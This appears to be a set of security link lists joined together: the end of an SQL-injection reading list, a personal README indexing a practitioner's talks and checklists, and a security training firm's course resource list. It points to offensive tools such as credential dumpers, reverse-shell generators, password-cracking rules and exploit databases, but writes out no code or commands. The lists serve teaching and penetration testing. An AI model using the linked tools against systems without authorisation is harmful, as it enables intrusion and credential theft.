* [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
* [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* Second Order:
* [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
* Sqlmap:
* [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
|
# FYI - This repo is a collection of my contents
<h4 align="left"> Made with ❤️ ❤️ ❤️ from <img src="https://user-images.githubusercontent.com/8291014/145205748-5530f102-9102-4659-a141-21872f237c57.png" alt="frogy" height=20px> </h4>
![](https://visitor-badge.glitch.me/badge?page_id=iamthefrogy.fyi)<a href="https://twitter.com/iamthefrogy"> </a>
I have been writing contents occasionally throughout my career at various places. I decided to collect, organize and share everything here. Hence created this repo. A few of the content might not be relevant now as they are of 2012 and 2013, but I decided to add them here. Knowing them might populate new ideas to anyone's brain, so good to add it here as FYI.
## List of contents:
+ **Defensive Security:**<br/>
+ [Risk-based Vulnerability Management Approach](https://github.com/iamthefrogy/FYI/blob/main/Material/Vulnerability%20Management%20Talk%20-%20ISACA%20-%20Chintan%20Gurjar.pdf)
+ [YouTube Talk - External attack surface management in Blue team](https://www.youtube.com/watch?v=i2X_L-auDm4)
+ [SOC monitoring mindmap](https://github.com/iamthefrogy/FYI/blob/main/Material/SOC%20Monitoring%20Mindmap.pdf)
+ [External attack surface management](https://github.com/iamthefrogy/FYI/blob/main/Material/External%20Attack%20Surface%20Management.pdf)
+ [Shadow IT + Threat intelligence architecture](https://www.linkedin.com/posts/chintangurjar_combining-shadowit-and-threat-intelligence-activity-6675604135687127040-Z7Ug)
+ [VM program key factors](https://www.linkedin.com/posts/chintangurjar_vm-program-activity-6686594201603334144-kO0O)
+ [Email security mindmap](https://www.linkedin.com/posts/chintangurjar_mindmap-activity-6749601616787329024-LvQl)
+ [Threat intelligence feeds collection](https://www.linkedin.com/posts/chintangurjar_important-threat-intelligence-feeds-collection-activity-6558281406139764736-oQFH)
+ [Vulnerability management tips](https://www.linkedin.com/posts/chintangurjar_vm-tips-activity-6744354327273574400-3MRg)
+ [Webinar - Building a vulnerability management program for your organization](https://www.youtube.com/watch?v=UcVflfpZdxI)
+ [Building a threat intelligence division for your organization - 1](https://github.com/iamthefrogy/FYI/blob/main/Material/Threat%20Intel%201.pdf)
+ [Building a threat intelligence division for your organization - 2](https://github.com/iamthefrogy/FYI/blob/main/Material/Threat%20Intel%202.pdf)
+ [Building a threat intelligence division for your organization - 3](https://github.com/iamthefrogy/FYI/blob/main/Material/Threat%20Intel%203.pdf)
+ [Building a threat intelligence division for your organization - 4](https://github.com/iamthefrogy/FYI/blob/main/Material/Threat%20Intel%204.pdf)
+ [Fool the network hunters](https://github.com/iamthefrogy/FYI/blob/main/Material/Fool%20The%20Network%20Hunters%20(Hackers).pdf)
+ [Application security maturity assessment in blue team](https://github.com/iamthefrogy/FYI/blob/main/Material/Application%20Security%20Maturity%20Assessment.pdf)
+ [Building a vulnerability management program for your organization](https://github.com/iamthefrogy/FYI/blob/main/Material/Vulnerability%20Management%20Talk%20-%20Cyberpreserve.pdf)
+ [Vulnerability Management end-to-end workflow diagram](https://github.com/iamthefrogy/FYI/blob/main/Material/Vulnerability%20Management%20end-to-end%20workflow%20diagram.pdf)
+ [Vulnerability Management Program Key Factors](https://github.com/iamthefrogy/FYI/blob/main/Material/Vulnerability%20Management%20Program%20Key%20Factors.pdf)
+ [Shadow IT + Threat Intel - Architecture Overview for Blue team](https://github.com/iamthefrogy/FYI/blob/main/Material/Shadow%20IT.pdf)
+ [iOS device security for SOC team](https://github.com/iamthefrogy/FYI/blob/main/Material/iOS%20device%20security%20monitoring%20in%20SOC.pdf)
+ [Practical Browser Forensics Checklist](https://github.com/iamthefrogy/FYI/blob/main/Material/Practical%20Browser%20Forensics%20Checklist.pdf)
+ [DevSecOps risk assessment framework](https://github.com/iamthefrogy/FYI/blob/main/Material/DevSecOPs%20Risk%20Assessment%20Framework.pdf)
+ [DevSecOps 201 checklist](https://github.com/iamthefrogy/FYI/blob/main/Material/DevSecOps%20201.pdf)
+ [Incident management maturity assessment](https://github.com/iamthefrogy/FYI/blob/main/Material/Incident%20Management%20Maturity%20Assessment.pdf)
+ [Vulnerability management tips](https://github.com/iamthefrogy/FYI/blob/main/Material/VM%20tips.pdf)
+ [Network architecture review checklist](https://www.linkedin.com/posts/chintangurjar_architecture-review-activity-6630742075061207040-OkX0)
+ [Threat hunting methodology](https://github.com/iamthefrogy/FYI/blob/main/Material/Threat%20hunting%20methodology.png)
+ [AV EDR solution selection criteria](https://github.com/iamthefrogy/FYI/blob/main/Material/AV%20EDR%20solution%20selection%20criteria.pdf)
+ [Threat intel feed sources mindmap](https://github.com/iamthefrogy/FYI/blob/main/Material/Threat%20intel%20feed%20sources.pdf)
+ [Data driven threat modeling case study - customer PII/PHI](https://github.com/iamthefrogy/FYI/blob/main/Material/Data%20driven%20threat%20modeling%20-%20customer%20PII.pdf)
+ **Offensive Security:**<br/>
+ [A complete web application pentest checklist](https://github.com/iamthefrogy/Web-Application-Pentest-Checklist/blob/main/Frogy's%20Mindmap.pdf)
+ [Marcomino - Malicious Macros Checklist](https://github.com/iamthefrogy/Macromino)
+ [Frogy - My own subdomain enumeration tool](https://github.com/iamthefrogy/frogy)
+ [Bucketbunny - Automation for open s3 bucket pocs for pentest/bugbounty/red-teamingsl](https://github.com/iamthefrogy/bucketbunny)
+ [Puttly - script to test PUT method with verification of uploaded file](https://github.com/iamthefrogy/puttly)
+ [Network VAPT checklist](https://github.com/iamthefrogy/FYI/blob/main/Material/Network%20Security%20VAPT%20Checklist.pdf)
+ [Dirty C0w Vulnerability Demo (CVE-2016-5195) - A privilege escalation vulnerability in the Linux Kernel](https://github.com/iamthefrogy/FYI/blob/main/Material/Dirty%20C0w%20Vulnerability%20Demo%20(CVE-2016-5195)%20-%20A%20privilege%20escalation%20vulnerability%20in%20the%20Linux%20Kernel.pdf)
+ [Windows Command Injection Vulnerability for a Command Shell](https://github.com/iamthefrogy/FYI/blob/main/Material/Windows%20Command%20Injection%20Vulnerability%20for%20a%20Command%20Shell.pdf)
+ [Powered e-Commerce Application Pentesting](https://github.com/iamthefrogy/FYI/blob/main/Material/Powered%20e-Commerce%20Application%20Pentesting.pdf)
+ [SSH Pentest checklist](https://github.com/iamthefrogy/FYI/blob/main/Material/SSH%20Pentest.pdf)
+ [Bug-bounty Tips & Motivation](https://github.com/iamthefrogy/FYI/blob/main/Material/Bug%20Bounty%20tips%20%26%20Motivation.pdf)
+ **Mobile Security (Android/iOS/hardware OS):**<br/>
+ [iOS Application Security - xCON Switch - Enable/Disable Detection without removing xCON Application from Cydia](https://github.com/iamthefrogy/FYI/blob/main/Material/iOS%20Application%20Security%20-%20xCON%20Switch%20-%20Enable%20Disable%20Detection%20without%20removing%20xCON%20Application%20from%20Cydia.pdf)
+ [Android OS phone security hardening guide](https://github.com/iamthefrogy/FYI/blob/main/Material/Android%20OS%20Phone%20Security%20Hardening%20Guide.pdf)
+ [Android Application Security - Using hmacSHA256 Encryption For Tamper Proof Request & Response](https://github.com/iamthefrogy/FYI/blob/main/Material/Android%20Anti%20Java%20Hooking%20-%20Adding%20Layer%20to%20your%20SSL%20pinning%20and%20Root%20detection.pdf)
+ [Xiaomi’s Analytics Application Security & Privacy Concern ](https://github.com/iamthefrogy/FYI/blob/main/Material/Xiaomi%E2%80%99s%20Analytics%20Application%20Security%20%26%20Privacy%20Concern.pdf)
+ [Android Application Hardening Checklist For Developers](https://github.com/iamthefrogy/FYI/blob/main/Material/Android%20Application%20Hardening%20Checklist%20For%20Developers.pdf)
+ [Android Kiosk Browser Lock down Security Testing Checklist](https://github.com/iamthefrogy/FYI/blob/main/Material/Android%20Kiosk%20Browser%20Lock%20down%20Security%20Testing%20Checklist.pdf)
+ [Android Application Backup Vulnerabiility Testing](https://github.com/iamthefrogy/FYI/blob/main/Material/Android%20Application%20Backup%20Vulnerabiility%20Testing.pdf)
+ [Android Anti Java Hooking - Adding Layer to your SSL pinning and Root detection](https://github.com/iamthefrogy/FYI/blob/main/Material/Android%20Anti%20Java%20Hooking%20-%20Adding%20Layer%20to%20your%20SSL%20pinning%20and%20Root%20detection.pdf)
+ [Blocking Adwares on Android - Protect against malwares and privacy](https://github.com/iamthefrogy/FYI/blob/main/Material/Blocking%20Adwares%20on%20Android%20-%20Protect%20against%20malwares%20and%20privacy.pdf)
+ [Messeging Apps Privacy Factors to Consider](https://github.com/iamthefrogy/FYI/blob/main/Material/Messeging%20Apps%20Privacy%20Factors%20to%20Consider.pdf)
+ **Risk Management/GRC/Compliance:**<br/>
+ [Failed Risk Management](https://github.com/iamthefrogy/FYI/blob/main/Material/Failed%20Risk%20Management.jpg)
+ [Data Center Security/Safety Review & Audit Checklist](https://github.com/iamthefrogy/FYI/blob/main/Material/Data%20Center%20Security%20Safety%20Review%20%26%20Audit%20Checklist.pdf)
+ [Corporate email auditing guidelines](https://github.com/iamthefrogy/FYI/blob/main/Material/Corporate%20Email%20Auditing%20Guidelines.pdf)
+ [Network architecture review checklist](https://github.com/iamthefrogy/FYI/blob/main/Material/Small%20network%20architecture%20review%20checklist.pdf)
+ [Auditing remote access process and procedures](https://github.com/iamthefrogy/FYI/blob/main/Material/Auditing%20remote%20access%20process%20and%20procedures.pdf)
+ [Security awareness program guide](https://github.com/iamthefrogy/FYI/blob/main/Material/Security%20awareness%20program%20guide.pdf)
+ [CISO core proficiency](https://www.linkedin.com/posts/chintangurjar_ciso-core-proficiency-activity-6571805475782881280-j_da)
+ **General Cybersecurity:**<br/>
+ [How to successfully break into Cybersecurity?](https://github.com/iamthefrogy/FYI/blob/main/Material/Breaking%20into%20Cybersecurity%20Successfully.pdf)
+ [Diversity in Cybersecurity - Video Interview](https://www.youtube.com/watch?v=z4vitOV7Zcc)
+ [Diversity in Cybersecurity Mindmap](https://github.com/iamthefrogy/FYI/blob/main/Material/Diversity%20in%20Cybersecurity.pdf)
+ [21 myths in the cybersecurity world](https://github.com/iamthefrogy/FYI/blob/main/Material/21%20Myths%20in%20Cybersecurity%20World.pdf)
+ [My talk on gender diversity for InfosecGirls community](https://www.youtube.com/watch?v=r1k8_RypZpk)
+ [Malware/EDR solutuon evaluation criteria for purchase](https://www.linkedin.com/posts/chintangurjar_a-quick-checklist-activity-6570203829973979136-YeDF)
+ [Cyber tranTransparency](https://github.com/iamthefrogy/FYI/blob/main/Material/Cyber%20Transparency.pdf)
+ [Security management challanges over the year](https://www.linkedin.com/posts/chintangurjar_security-management-challenges-activity-6678562350733369344-6M8B)
+ [Securing remote workspace during COVID-19](https://github.com/iamthefrogy/FYI/blob/main/Material/COVID-19%20Securing%20Remote%20Workspace.pdf)
+ [Security awareness program maturity](https://www.linkedin.com/posts/chintangurjar_security-awareness-program-guide-activity-6611001672187682816-5W1f)
+ [Security management challenges over the years](https://github.com/iamthefrogy/FYI/blob/main/Material/Security%20management%20challenges%20over%20the%20years.pdf)
+ [Hindi Language - How to be safe from online scams](https://www.youtube.com/watch?v=jBEW2TzTXdY)
+ [21+1 myths in Cybersecurity world](https://www.linkedin.com/posts/chintangurjar_myths-in-cybersecurity-activity-6697806039032692736-dut3)
+ **Cryptocurrency:**<br/>
+ [Less perks and more pitfalls of cryptocurrency](https://github.com/iamthefrogy/FYI/blob/main/Material/Less%20perks%20and%20more%20pitfalls%20of%20cryptocurrency.pdf)
+ [How to analyze and review a crypto coin before investing into it](https://github.com/iamthefrogy/FYI/blob/main/Material/Crypto%20Investment%20Analysis.pdf)
Warning/Disclaimer: Read the detailed disclaimer at my blog - https://github.com/iamthefrogy/Disclaimer-Warning/blob/main/README.md
|
# Security Resources 📖
Links to online resources & tools we use during our web application / network
security [courses](https://compass-security.com/en/trainings).
You can create a PR or open an issue if you think we missed a useful resource.
Short URL: https://git.io/secres
## Compass Security 🧭
- Compass Security: https://compass-security.com/de/
- Compass Security Blog: https://blog.compass-security.com/
- Hacking Lab 1.0: https://www.hacking-lab.com/
- Hacking Lab 2.0: https://compass.hacking-lab.com/
- Hacking Lab Live CD: https://livecd.hacking-lab.com/
## General 🌳
### Link Lists
- Awesome Security: https://github.com/sbilly/awesome-security
- InfoSec Reference That Doesn't Suck!(Much): https://rmusser.net/docs/index.html
- Awesome Penetration Testing: https://github.com/enaqx/awesome-pentest
- Security Checklists from pentestlab.blog: https://github.com/netbiosX/Checklists
- Security Tools Collection: https://tools.tldr.run/
- Public Pentest Reports: https://github.com/juliocesarfort/public-pentesting-reports
- Security Zines: https://securityzines.com/
### Hacking-Notebooks
- Payload All The Things: https://github.com/swisskyrepo/PayloadsAllTheThings
- HackTricks: https://book.hacktricks.xyz/
- Red Teaming Experiments: https://www.ired.team/
- Pentester's promiscuous Notebook: https://ppn.snovvcrash.rocks/ (by snovvcrash https://snovvcrash.rocks/)
### Tutorials
- Various Security Tutorials by Prof. Andreas Steffen, strongSec GmbH: https://github.com/strongX509/cyber/
### Online Tools
- CyberChef: https://gchq.github.io/CyberChef/
- Useful Web Tools by @h43z: https://h.43z.one/
- Explain Shell Commands: https://explainshell.com/
- Online Regex Tester & Debugger: https://regex101.com/
### Reading
- Phrack: http://phrack.org/
- PoC||GTFO: https://www.alchemistowl.org/pocorgtfo/
### Talks & Videos
- media.ccc.de: https://media.ccc.de/
- LiveOverflow: https://www.youtube.com/c/LiveOverflowCTF/
- Stacksmashing: https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw
- IppSec (Hack The Box Walkthroughs): https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
- /dev/null: https://www.youtube.com/channel/UCGISJ8ZHkmIv1CaoHovK-Xw
- DEFCON Switzerland / Area41: https://www.youtube.com/user/defconswitzerland/
- Swiss Cyber Storm: https://www.youtube.com/channel/UCY-Wb3JuBv_xpa8s6ZrpUxg/
- Cooper Recordings: https://administraitor.video/
- DEFCON: https://www.youtube.com/user/DEFCONConference/
- Black Hat: https://www.youtube.com/user/BlackHatOfficialYT
## Web Application Security 🐝
### References
- HTML Standard: https://html.spec.whatwg.org/
- W3Schools: https://www.w3schools.com/
- Mozilla Developer Network (MDN): https://developer.mozilla.org/
### General
- Compass Demo: https://www.compass-demo.com/
- PortSwigger Online Seminar: https://portswigger.net/web-security
- OWASP: https://owasp.org/
- OWASP Top 10
- Project Page: https://owasp.org/www-project-top-ten/
- New Project Page: https://www.owasptopten.org/
- GitHub: https://github.com/OWASP/Top10
- OWASP Application Security Verification Standard (ASVS)
- Project Page: https://owasp.org/www-project-application-security-verification-standard/
- GitHub: https://github.com/OWASP/ASVS
- API Security: https://www2.owasp.org/www-project-api-security/
- Cheat Sheet Series: https://cheatsheetseries.owasp.org/
- Juice Shop
- Project Page: https://owasp-juice.shop/, https://owasp.org/www-project-juice-shop/
- GitHub: https://github.com/bkimminich/juice-shop
- Companion Guide: https://pwning.owasp-juice.shop/
- Demo: https://juice-shop.herokuapp.com/
- OWASP Switzerland
- Chapter Page: https://owasp.org/www-chapter-switzerland/
- Mailing List: https://groups.google.com/a/owasp.org/forum/#!forum/switzerland-chapter
- Twitter: https://twitter.com/owasp_ch
- YouTube: https://www.youtube.com/channel/UCut4rjo2pUSdtnX3hUbi9_Q
- Presentation Slides Repo:https://github.com/OWASP/www-chapter-switzerland/tree/master/assets/slides
- Stanford Web Security Class: https://web.stanford.edu/class/cs253/
### HTTP & Web Basics
- HTTP Status Codes: https://httpstatuses.com/
- Can I Use (Browser Support Matrix): https://caniuse.com/
- Mozilla Developer Network: https://developer.mozilla.org/
### Web Standards
- W3C Overview: https://www.w3.org/TR/
- CORS: https://www.w3.org/TR/2020/SPSD-cors-20200602/
- HTTP/2 Explained: https://http2-explained.haxx.se/
- HTTP/3 Explained: https://http3-explained.haxx.se/
- HTTP/2 Speed Demo: https://http2.akamai.com/demo
### Reverse Proxies
- Weird Proxies: https://github.com/GrrrDog/weird_proxies
### Authentication & Login
- Have I Been Pwned (Password Leaks): https://haveibeenpwned.com/
- Pwned Passwords: https://haveibeenpwned.com/Passwords
- Dehashed Leaked Passwords Database: https://www.dehashed.com/
- Hashes.org (Password Hash Database): https://hashes.org/
### OAuth 2.0 / OpenID Connect (OIDC)
- OAuth.net: https://oauth.net/2/
- OAuth 2.0 Simplified: https://www.oauth.com/
- The OAuth 2.0 Authorization Framework, RFC 6749: https://tools.ietf.org/html/rfc6749
- OAuth 2.0 Security Best Current Practice: https://tools.ietf.org/html/draft-ietf-oauth-security-topics-16
- OpenID Connect & OAuth 2.0 - Security Best Practices, Dominick Baier, 2020: https://www.youtube.com/watch?v=AUgZffkurK0
- OAuth 2.0 for Browser-Based Apps: https://tools.ietf.org/html/draft-ietf-oauth-browser-based-apps-07
- OIDC Discovery: https://auth0.com/docs/protocols/configure-applications-with-oidc-discovery)
- Real-life OIDC Security: https://security.lauritz-holtmann.de/post/sso-security-overview/
### Cross-Site Scripting (XSS)
- PortSwigger XSS Cheat Sheet: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
- XSS Payloads: https://html5sec.org/
- XSS Hunter: https://xsshunter.com/
- XSS Polyglot: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
- Script Gadgets: https://github.com/google/security-research-pocs (bypass overview: https://github.com/google/security-research-pocs/blob/master/script-gadgets/bypasses.md)
- Browser Exploitation Framework (BeEF): https://beefproject.com/
- Attack Examples
- XSS in Electron App leads to RCE: https://blog.doyensec.com/2017/08/03/electron-framework-security.html
- XSS in Google Search Field: https://www.youtube.com/watch?v=lG7U3fuNw3A
- XSS in Tweetdeck Twitter Client: https://twitter.com/dergeruhn/status/476764918763749376?lang=en
### Cross-Site Request Forgery (CSRF)
- Same-Site Cookie Flag: https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-06
- Public Suffix List (https://publicsuffix.org): https://publicsuffix.org/list/public_suffix_list.dat
### Security Headers
- Security Headers: https://securityheaders.com/
- Content Security Policy (CSP) Evaluator: https://csp-evaluator.withgoogle.com/ (Code: https://github.com/google/csp-evaluator)
- HSTS Preloading: https://hstspreload.org
### JSON Web Tokens (JWT)
- JWT Decoder/Encoder: https://jwt.io/
- PentesterLab JWT Cheat Sheet: https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf
- JWT Tool for testing: https://github.com/ticarpi/jwt_tool
- Convert JWK to PEM:
- Crypto Playground: https://8gwifi.org/jwkconvertfunctions.jsp
- Keytool: https://keytool.online/
- Attack Examples
- Algorithm Confusion
- Auth0 Info: https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
- pyjwt CVE-2017-11424: https://www.cvedetails.com/cve/CVE-2017-11424/
- pyjwt fix: https://github.com/jpadilla/pyjwt/commit/88a9fc56bdc6c870aa6af93bda401414a217db2a, https://github.com/jpadilla/pyjwt/commit/37926ea0dd207db070b45473438853447e4c1392
### SQL Injection (SQLi)
- PortSwigger SQL Injection Cheat Sheet: https://portswigger.net/web-security/sql-injection/cheat-sheet
### XML External Entities (XXE)
- Attack Examples
- Sending mails via SMTP using XXE: https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/
### Tools
- Burp Suite: https://portswigger.net/burp/communitydownload
- SQLMap: https://sqlmap.org/
- SQLMap cheat sheet: https://www.comparitech.com/net-admin/sqlmap-cheat-sheet/
- Burp Suite Extensions
- Burp Suite Extensions Overview: https://apps.burpsuite.guide/
- SAML Raider: https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e, https://github.com/CompassSecurity/SAMLRaider
- JSON Web Tokens: https://portswigger.net/bappstore/f923cbf91698420890354c1d8958fee6, https://github.com/portswigger/json-web-tokens
- Talk "Automated security testing for Software Developers who dont know security!" (shows how to use OWASP ZAP in a CI/CD pipeline): https://media.ccc.de/v/Camp2019-10181-automated_security_testing_for_software_developers_who_dont_know_security
### Hacking Environments
- OWASP Web Goat: https://owasp.org/www-project-webgoat/
- Damn Vulnerable Web Application: https://www.dvwa.co.uk/
- OWASP JuiceShop: https://owasp.org/www-project-juice-shop/
## Transport Layer Security (TLS) 🔐
### TLS Information
- SSL/TLS and PKI History: https://www.feistyduck.com/ssl-tls-and-pki-history/
- Every Byte of a TLS Connection: https://tls.ulfheim.net/
- Every Byte of a TLS Connection for TLS 1.3: https://tls13.ulfheim.net/
- Cipher Suite Ratings: https://ciphersuite.info/
### Online Services
- SSL Labs (TLS Server Test): https://ssllabs.com
- Hardenize: https://hardenize.com/
- BadSSL: Weak TLS Configuration Test Page: https://badssl.com
- Certificate Transparency Search: https://crt.sh/
### Tools
- SSLyze TLS Server Test Tool: https://github.com/nabla-c0d3/sslyze
## Cryptography 🔏
- Key Lengths: https://keylength.com
- Cryptopals Crypto Challenges: https://cryptopals.com/
- CryptoHack: https://cryptohack.org/
- Key generation / conversion: https://keytool.online/
## Container Security 🐳
- contained.af (separation examples): https://contained.af/
## Network Pentesting 💻
### General
- Hacking Tools Cheat Sheet: https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet
- Porchetta Industries OpenSource Tools Support: https://porchetta.industries/
- Security Best Practices for On-Premise Environments: https://github.com/CompassSecurity/OnPremSecurityBestPractices
### Information Gathering & Wordlists
- Amass: https://github.com/OWASP/Amass
- Sublist3r: https://github.com/aboul3la/Sublist3r
- Shodan: https://www.shodan.io/
- Censys: https://censys.io/
- Payload All The Things: https://github.com/swisskyrepo/PayloadsAllTheThings
- VirusTotal: https://www.virustotal.com/
- FuzzDB: https://github.com/fuzzdb-project/fuzzdb
- SecLists: https://github.com/danielmiessler/SecLists
- Rapid7 Open Data: https://opendata.rapid7.com/
- CeWL: https://github.com/digininja/CeWL
### Online Services
- PortQuiz: http://portquiz.net/
- nip.io (wildcard DNS): https://nip.io/
- RequestBin.NET: https://requestbin.net/
- ngrok: https://ngrok.com/
- Various useful tools: https://h.43z.one/
- Request Logger: https://log.43z.one/
- IP Address Convertor (useful for SSRF): https://h.43z.one/ipconverter/
### Scanning
- Nmap: https://nmap.org/
- Nmap-parse-output: https://github.com/ernw/nmap-parse-output
- Aquatone: https://github.com/michenriksen/aquatone
- SMBMap: https://github.com/ShawnDEvans/smbmap
- Snaffler: https://github.com/SnaffCon/Snaffler
- Subjack: https://github.com/haccer/subjack
### Sniffing
- Sniffing Tools
- tcpdump: https://www.tcpdump.org/
- Wireshark / Tshark: https://www.wireshark.org/
- PCAP Collection
- Wireshark Samle Captures: https://wiki.wireshark.org/SampleCaptures
- Sniffing Analysis
- PacketTotal: https://packettotal.com/
- A-Packets: https://apackets.com/
- Extract credentials from network interfaces / PCAP files
- net-creds: https://github.com/DanMcInerney/net-creds
- PCredz: https://github.com/lgandx/PCredz
## Protocol Hacking
- Network Programming in Python: https://0xbharath.github.io/python-network-programming/
- Python Foundations: https://0xbharath.github.io/python-foundations/
- Scapy: https://scapy.net/
- Workshop: The Art of Packet Crafting with Scapy by @0xbharath
- GitHub: https://github.com/0xbharath/art-of-packet-crafting-with-scapy
- Online Notes: https://scapy.disruptivelabs.in/
### Protocols
- DNS
- DNSViz (show DNSSEC chain): https://dnsviz.net/
- Public .ch DNS Zone: https://www.switch.ch/open-data/#tab-c5442a19-67cf-11e8-9cf6-5254009dc73c-3
- Search Tool: https://search-ch-domains.idocker.hacking-lab.com/
- Mailing
- Email Infrastructure: https://www.hardenize.com/labs/policy?s=09
- Email Spoofing Mitigations
- Google: Help prevent spoofing and spam with DMARC: https://support.google.com/a/answer/2466580
- Actually, DMARC works fine with mailing lists: https://begriffs.com/posts/2018-09-18-dmarc-mailing-list.html
- Learn and Test DMARC: https://www.learndmarc.com/
### Exploiting
- Vulnerability Database: https://cvedetails.com/
- Exploit Database: https://www.exploit-db.com/
- Metasploit: https://www.metasploit.com/
- Reverse Shell Generator: https://www.revshells.com/
- Hak5 Gadget Shop: https://shop.hak5.org/
- Covenant: https://github.com/cobbr/Covenant
### Cracking
- General Information
- Talk "G1234! - Password Cracking 201: Beyond the Basics - Royce Williams": https://www.youtube.com/watch?v=cSOjQI0qbuU
- Online Brute Force Tools
- Ncrack: https://nmap.org/ncrack/
- Hydra: https://github.com/vanhauser-thc/thc-hydra
- Offline Brute Force Tools
- Name-That-Hash: https://github.com/HashPals/Name-That-Hash
- Hashcat: https://hashcat.net/hashcat/
- John The Ripper: https://www.openwall.com/john/
- Offline Burte Force Services
- CrackStation: https://crackstation.net/
- Crack.sh (DES Cracker): https://crack.sh/
- Wordlists
- Password Lists from SecLists: https://github.com/danielmiessler/SecLists/tree/master/Passwords
- CrackStation Dictionary: https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
- PWDB - New generation of Password Mass-Analysis: https://github.com/ignis-sec/Pwdb-Public
- Rules
- NSA Rules: https://github.com/NSAKEY/nsa-rules
- Hob0Rules: https://github.com/praetorian-inc/Hob0Rules
- Corporate Rule: https://github.com/sparcflow/StratJumbo/blob/master/chap3/corporate.rule
- OneRuleToRuleThemAll: https://github.com/NotSoSecure/password_cracking_rules
- Hashcat Rules: https://github.com/hashcat/hashcat/tree/master/rules (e.g. best64 rule)
### Linux Privilege Escalation
- Enumeration
- LinEnum: https://github.com/rebootuser/LinEnum
- linPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
- pspy (unprivileged Linux process snooping): https://github.com/DominicBreuker/pspy
- Glyptodon (search for suspicious files): https://blog.sevagas.com/?-Glyptodon
- Lynis: https://cisofy.com/lynis/
- Privilege Escalation Methods
- Sudo privesc on Compass Blog: https://blog.compass-security.com/tag/sudo/
- HackTricks Linux Privilege Escalation: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist and https://book.hacktricks.xyz/linux-unix/privilege-escalation
- PayloadsAllTheThings Linux Privilege Escalation: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- Back To The Future: Unix Wildcards Gone Wild (Wildcard Injection): https://www.exploit-db.com/papers/33930
- Exploitation Tools
- LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
- GTFOBins: https://gtfobins.github.io/
- GTFOBLookup: https://github.com/nccgroup/GTFOBLookup
- Hardening
- Distribution Independent Linux CIS Benchmark: https://www.cisecurity.org/benchmark/distribution_independent_linux/
### Windows & Active Directory (AD)
- Attacks / Methodologies
- Active Directory Security: https://adsecurity.org/
- AD Exploitation Cheat Sheet: https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
- Orange Cyberdefense Active Directory Pentest Mindmap: https://orange-cyberdefense.github.io/ocd-mindmaps/
- The Dog Whisperer's Handbook: https://www.ernw.de/download/BloodHoundWorkshop/ERNW_DogWhispererHandbook.pdf
- Not A Security Boundary: Breaking Forest Trusts: https://posts.specterops.io/not-a-security-boundary-breaking-forest-trusts-cd125829518d
- Attacking Active Directory: 0 to 0.9: https://zer1t0.gitlab.io/posts/attacking_ad/?s=09
- Windows & Active Directory Exploitation Cheat Sheet and Command Reference: https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/
- Kerberos
- Introduction Videos by ATTL4S (https://twitter.com/DaniLJ94)
- You Do (Not) Understand Kerberos: Introduction: https://www.youtube.com/watch?v=4LDpb1R3Ghg
- You Do (Not) Understand Kerberos Delegation - Introduction: https://www.youtube.com/watch?v=p9QFdITuvgU
- You Do (Not) Understand Kerberos Delegation - Unconstrained Delegation: https://www.youtube.com/watch?v=xDFRUYv1-eU&t=580s
- You Do (Not) Understand Kerberos Delegation - Constrained Delegation: https://www.youtube.com/watch?v=gzqq2r6cZjc&t=2288s
- You Do (Not) Understand Kerberos Delegation - RBCD: https://www.youtube.com/watch?v=vlKwCTvp5_w&t=1185s
- CVE-2020-17049: Kerberos Bronze Bit Attack Theory: https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-theory/
- Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
- Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How Compromise of a Single Server Can Compromise the Domain): https://adsecurity.org/?p=1667
- Kerberos Attack Cheat Sheet: https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
- Active Directory Certificate Services
- Abusing Active Directory Certificate Services Whitepaper: https://specterops.io/assets/resources/Certified_Pre-Owned.pdf
- Abusing Active Directory Certificate Services Blogpost: https://posts.specterops.io/certified-pre-owned-d95910965cd2
- Best Practices
- Domain-Join Computers the Proper Way: https://blog.compass-security.com/2020/03/domain-join-computers-the-proper-way/
- Administrative Tier Model (Archived Article): https://web.archive.org/web/20201210154206/https://docs.microsoft.com/en-us/windows-[…]ivileged-access/securing-privileged-access-reference-material
- Tools
- Sysinternals: https://docs.microsoft.com/en-us/sysinternals/#sysinternals-live
- Sysinternals Direct Download: https://live.sysinternals.com/
- PowerSploit: https://github.com/PowerShellMafia/PowerSploit
- PowerUpSQL: https://github.com/NetSPI/PowerUpSQL
- Mimikatz: https://github.com/gentilkiwi/mimikatz
- Impacket: https://github.com/SecureAuthCorp/impacket
- Responder: https://github.com/lgandx/Responder
- CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
- CredNinja: https://github.com/Raikia/CredNinja
- BloodHound
- Project Page: https://github.com/BloodHoundAD/BloodHound
- Compass Custom BloodHound Queries: https://github.com/CompassSecurity/BloodHoundQueries
